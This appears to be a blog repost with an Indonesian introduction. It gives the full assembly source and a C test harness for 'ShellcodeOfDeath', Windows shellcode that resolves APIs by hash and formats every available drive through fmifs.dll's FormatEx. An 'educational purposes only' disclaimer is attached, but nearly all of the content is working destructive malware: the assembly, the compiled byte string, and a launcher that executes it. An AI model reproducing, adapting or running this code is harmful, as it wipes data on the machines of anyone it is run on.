ShellcodeOfDeath telah dirancang untuk format semua drive yang tersedia di Windows.
Catatan: shellcode ini dikembangkan hanya untuk tujuan pendidikan saja. penulis tidak dan tidak akan bertanggung jawab untuk penggunaan ilegal atau tidak sah dari ShellcodeOfDeath. Setiap penggunaan shellcode ini adalah risiko dari pembaca sendiri.
======================================================================
Start Of Code - ShellcodeOfDeath.s
======================================================================
/*
* _ __ _____
* /\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
* / /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
* / __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
* \/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
* |___/
* http://hacksys.vfreaks.com/
* hacksysteam@hotmail.com
*
* Shellcode Of Death
* v1.0
*
* Ruei-Min Jiang (@mike820324) a.k.a MicroMike
* Ashfaq Ansari (ashfaq_ansari1989@hotmail.com)
*
* Still a lot can be done to improve this shellcode. This is the first release.
* Further, a lot of improvement and optimization can be done to this shellcode.
* Any bugs, suggestions or contribution is most welcomed.
*
* Lenth of shellcode: 387 bytes
* Number of NULL byte: 49
*
* Notes: There are more NULL bytes due to a fact that few of the Windows API used
* accepts input in UNICODE format. Still, NULL bytes can be reduces further.
* We can use any simple encoder to xor encode the shellcode and eventually
* eliminate NULL bytes.
*
* Things to do:
* 1. Code cleanup
* 2. Optimization
* 3. Minification
* 4. Add suggestions
*/
.globl _main
_main:
jmp start_shell;
/*
* %edx store the base address of kernel32.dll (input)
* %ebx points to the start of symbal name table (input)
* %ecx contains the destination hash value (input)
* %eax is the index_counter (output)
*/
hash_function:
xorl %eax,%eax;
next_entry:
mov (%ebx,%eax,4), %esi;
addl %edx, %esi;
push %ebx;
push %eax;
xor %ebx, %ebx;
continue_hash:
xor %eax, %eax;
lodsb;
rol $5, %ebx;
addl %eax, %ebx;
cmp $0, %eax;
jnz continue_hash;
ror $5, %ebx;
cmp %ecx, %ebx;
pop %eax;
pop %ebx;
je hash_finish;
inc %eax;
jmp next_entry;
hash_finish:
ret;
/*
* input:
* set %edx to the dll base address
* set %ecx as the hash value you want to compare
* output:
* %eax is the API address
*/
get_address:
PE_init:
movl %edx, %eax;
movl 0x3c(%eax), %eax;
movl 0x78(%edx, %eax), %eax;
leal (%edx, %eax), %eax;
pushl %eax;
movl 0x20(%eax), %eax;
leal (%edx, %eax), %ebx;
call hash_function;
popl %ebx;
movl 0x24(%ebx), %ecx;
leal (%edx, %ecx), %ecx;
movw (%ecx, %eax, 2), %ax;
andl $0x0000ffff, %eax;
movl 0x1c(%ebx), %ebx;
leal (%edx, %ebx), %ebx;
movl (%ebx, %eax, 4), %eax;
leal (%edx, %eax), %eax;
ret;
/*
* hash value for each API
* LoadLibraryA = 0x331adddc
* CloseHandle = 0xd7629096
* CreateFileA = 0xcfb0e506
* ExitProcess = 0xec468f87
* Sleep = 0x567a110
* DeviceIOControl = 0x3b34d4a7
* --------------fmifs.dll---------------
* FormatEx = 0xab025b64
*/
start_shell:
set_Kernel32_env:
xorl %ecx, %ecx
movl %fs:0x30, %eax;
movl 0xc(%eax), %eax;
movl 0x1c(%eax), %eax;
next_module:
movl 0x8(%eax), %edx;
movl 0x20(%eax), %edi;
movl (%eax), %eax;
cmp 0x18(%edi), %cl;
jne next_module;
set_hash_table:
pushl $0xab025b64;
pushl $0x0567a110;
pushl $0x3b34d4a7;
pushl $0xd7629096;
pushl $0xec468f87;
pushl $0xcfb0e506;
pushl $0x331adddc;
movl %esp, %ebp;
end_hash_table:
set_api_table:
init_variable:
pushl $7;
popl %ecx;
xorl %edi, %edi;
loop_start:
cmp $1, %ecx;
jne set_kernel32_api;
set_fmifs_env:
pushl %ecx;
jmp data_string;
back_to_here:
restore_loadlibrary:
movl 0x1c(%esp), %eax;
call *%eax;
movl %eax, %edx;
popl %ecx;
set_kernel32_api:
pushl %ecx;
movl (%ebp, %edi, 4), %ecx;
call get_address;
popl %ecx;
pushl %eax;
inc %edi;
loop loop_start;
movl %esp, %ebp;
jmp start_main_code;
data_string:
call back_to_here;
.string "fmifs.dll";
start_main_code:
Get_string_addr:
jmp 2f;
1:;
popl %esi;
Format_start_loop:
pushl $23;
popl %ecx;
format_loop_start:
movl %ecx, %edi;
CreateFile_call:
xorl %edx, %edx;
pushl %edx;
pushl %edx;
pushl $3;
pushl %edx;
pushl $3;
pushl $0xc0000000;
pushl %esi;
movl 0x14(%ebp), %ebx;
call *%ebx;
Store_File_Handle:
pushl %eax;
subl $0x4, %esp;
xorl %edx, %edx;
DeviceIOControl_call:
pushl %edx;
leal 0x4(%esp), %ebx
pushl %ebx;
pushl %edx;
pushl %edx;
pushl %edx;
pushl %edx;
pushl $0x90020;
pushl %eax;
movl 0x8(%ebp), %ebx
call *%ebx;
close_file_handle:
pushl 0x4(%esp);
movl 0xc(%ebp), %ebx;
call *%ebx;
FormatEx_call:
leal call_back-string_start(%esi),%eax;
pushl %eax;
pushl $4096;
pushl $1;
leal volume_label-string_start(%esi), %eax;
pushl %eax;
leal string2_start-string_start(%esi), %eax;
pushl %eax;
pushl $0xc;
leal 0x8(%esi), %eax;
pushl %eax;
movl (%ebp), %ebx;
call *%ebx;
sleep_call:
pushl $200;
movl 0x4(%ebp), %ebx
call *%ebx;
loop_end:
movl %edi, %ecx
addl $1, 0x8(%esi);
loop format_loop_start;
exit_process:
push $0;
movl 0x10(%ebp), %ebx;
call *%ebx;
2:;
call 1b;
string_start:
.byte 0x5c, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x00, 0x00
string2_start:
.byte 0x4e, 0x00, 0x54, 0x00, 0x46, 0x00, 0x53, 0x00, 0x00, 0x00
/*
* Volume Label
* Set the name of the Volume label
* after formatting the respective volume.
* Modify volume_label as you desire.
* Deafult value -- PwNeD
*/
volume_label:
.byte 0x50, 0x00, 0x77, 0x00, 0x4E, 0x00, 0x65, 0x00, 0x44, 0x00, 0x00, 0x00
call_back:
push %ebp;
movl %esp, %ebp;
xorl %eax, %eax;
inc %eax;
pop %ebp;
ret $0xc;
======================================================================
End Of Code - ShellcodeOfDeath.s
======================================================================
======================================================================
Testing Shellcode - ShellcodeTestUnEncoded.c
======================================================================
#include
#include
/*
_ __ _____
/\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
/ /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
/ __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
|___/
http://hacksys.vfreaks.com/
hacksysteam@hotmail.com
Module Name:
Shellcode Test Encoded
Abstract:
This program is used as a template to test
C style formatted shellcodes. A decoder is
already added to the final shellcode output.
IDE:
Dev-C++ 4.9.9.2 (Windows XP SP3)
Compiler:
gcc 3.4.2
*/
unsigned char shellcode[] =
"\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50"
"\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83"
"\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b"
"\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c"
"\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20"
"\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b"
"\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff"
"\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83"
"\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00"
"\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b"
"\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64"
"\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4"
"\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46"
"\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33"
"\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75"
"\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89"
"\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff"
"\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8"
"\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64"
"\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf"
"\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00"
"\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83"
"\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52"
"\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d"
"\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff"
"\xd3\x8d\x86\x26\x00\x00\x00\x50\x68\x00\x10"
"\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50"
"\x8d\x86\x10\x00\x00\x00\x50\x6a\x0c\x8d\x46"
"\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00"
"\x00\x8b\x5d\x04\xff\xd3\x89\xf9\x83\x46\x08"
"\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8"
"\x7d\xff\xff\xff\x5c\x00\x5c\x00\x2e\x00\x5c"
"\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00"
"\x54\x00\x46\x00\x53\x00\x00\x00"
// Volume Label. You may want to change this.
// Default: PwNeD
"\x50\x00\x77\x00\x4e\x00\x65\x00\x44\x00"
// Volume Label End
"\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00";
main()
{
int i, badchar_c = 0;
printf("\n\nShellcode Length: %d\n", sizeof(shellcode)-1);
for(i = 0; i < sizeof(shellcode)-1; ++i) {
if(((unsigned char *)shellcode)[i] == 0x00) {
badchar_c = badchar_c + 1;
}
}
printf("\nNumber of badchar: %d\n\n", badchar_c);
printf("\nPress any key to execute shellcode....\n\n");
getch();
int (*ret)() = (int(*)())shellcode;
ret();
}
======================================================================
End Testing Shellcode - ShellcodeTestUnEncoded.c
======================================================================
0 comments "Shellcode Of Death", Baca atau Masukkan Komentar
Post a Comment